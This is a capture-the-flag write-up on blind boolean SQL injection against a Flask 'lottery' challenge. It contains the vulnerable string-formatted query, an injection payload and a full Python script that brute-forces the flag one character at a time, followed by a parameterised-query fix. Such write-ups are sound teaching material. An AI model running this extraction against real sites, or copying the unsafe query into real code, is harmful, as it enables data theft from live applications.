lottery
SRC: https://library.m0unt41n.ch/challenges/lottery
Blind SQL injection
Python:
    from flask import Flask, request, render_template

    app = Flask(__name__)
    # cur: the SQLite cursor used by the challenge; it is opened elsewhere in the
    # challenge source and is not shown on this page.

    @app.route("/", methods=["GET", "POST"])
    def index():
        has_guessed = False
        answer_correct = False
        if request.method == "POST":
            has_guessed = True
            guess = request.form.get("guess", "")
            # The guess is interpolated straight into the SQL text (no bound parameter),
            # so a quote in the input ends the string literal and the rest is parsed as SQL.
            cur.execute(f"SELECT * FROM answers WHERE answer = '{guess}'")
            rows = cur.fetchall()
            # Only this boolean reaches the user, never the row contents.
            answer_correct = len(rows) > 0
        return render_template("index.html", has_guessed=has_guessed, answer_correct=answer_correct)
This code is vulnerable to SQL injection, but it never returns any query data, only a boolean: whether rows were found or not. That is enough for a classic blind (boolean-based) injection.
Therefore we craft a query that lets us brute-force the character at each position of the flag:
' OR SUBSTR((SELECT answer FROM answers WHERE answer LIKE 'cyberskills23{%'),1,1)='c' --
The flag prefix was known, so we just test the substring at each successive position until we hit a }.
Here's the finished exploit:
Python:
    import string, requests

    URL = 'remote'
    flag = ''
    max_length = 150

    # SUBSTR is 1-indexed and the 14-character prefix 'cyberskills23{' is known,
    # so the first unknown character is at position 15. Since the prefix is
    # fairly long it was worth adjusting the range.
    for pos in range(15, max_length):
        for ch in string.printable:
            payload = (
                "' OR SUBSTR((SELECT answer FROM answers WHERE answer LIKE 'cyberskills23{%'),"
                f"{pos},1)='{ch}' -- "
            )
            r = requests.post(URL, data={'guess': payload})
            # The page renders a success alert only when the injected condition is true,
            # which is the one bit of information the blind oracle gives us.
            if 'alert-success' in r.text:
                flag += ch
                print(f"Pos {pos}: {ch}")
                break
        # The closing brace marks the end of the flag.
        if flag.endswith('}'):
            break

    print("Flag:", "cyberskills23{" + flag)
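As an added example (not part of the original writeup), the challenge handler's string-formatted query beside a parameterised version, both run against a constructed in-memory SQLite table so the difference is observable: the page's payload makes the formatted query return a row, while the bound query compares the whole payload as a literal and returns nothing. The table layout and the flag value are assumptions.

```python
import sqlite3

# Constructed stand-in for the challenge database: a single-column `answers`
# table holding a made-up flag (the real flag is not on the page).
FLAG = "cyberskills23{demo_flag}"

# The boolean-oracle payload quoted in the writeup, testing the first character.
PAYLOAD = ("' OR SUBSTR((SELECT answer FROM answers WHERE answer LIKE "
           "'cyberskills23{%'),1,1)='c' -- ")


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE answers (answer TEXT)")
    con.execute("INSERT INTO answers VALUES (?)", (FLAG,))
    return con


def vulnerable_lookup(con, guess):
    # Same construction as the challenge handler: the guess becomes SQL text,
    # so the quote in the payload closes the literal and the OR clause runs.
    cur = con.execute(f"SELECT * FROM answers WHERE answer = '{guess}'")
    return len(cur.fetchall()) > 0


def safe_lookup(con, guess):
    # Parameterised query: the driver binds the guess as a value, never as SQL,
    # so the injected clause is compared character-for-character with the column.
    cur = con.execute("SELECT * FROM answers WHERE answer = ?", (guess,))
    return len(cur.fetchall()) > 0


if __name__ == "__main__":
    db = make_db()
    print("formatted query, payload :", vulnerable_lookup(db, PAYLOAD))  # True
    print("bound query, payload     :", safe_lookup(db, PAYLOAD))        # False
    print("bound query, real flag   :", safe_lookup(db, FLAG))           # True
```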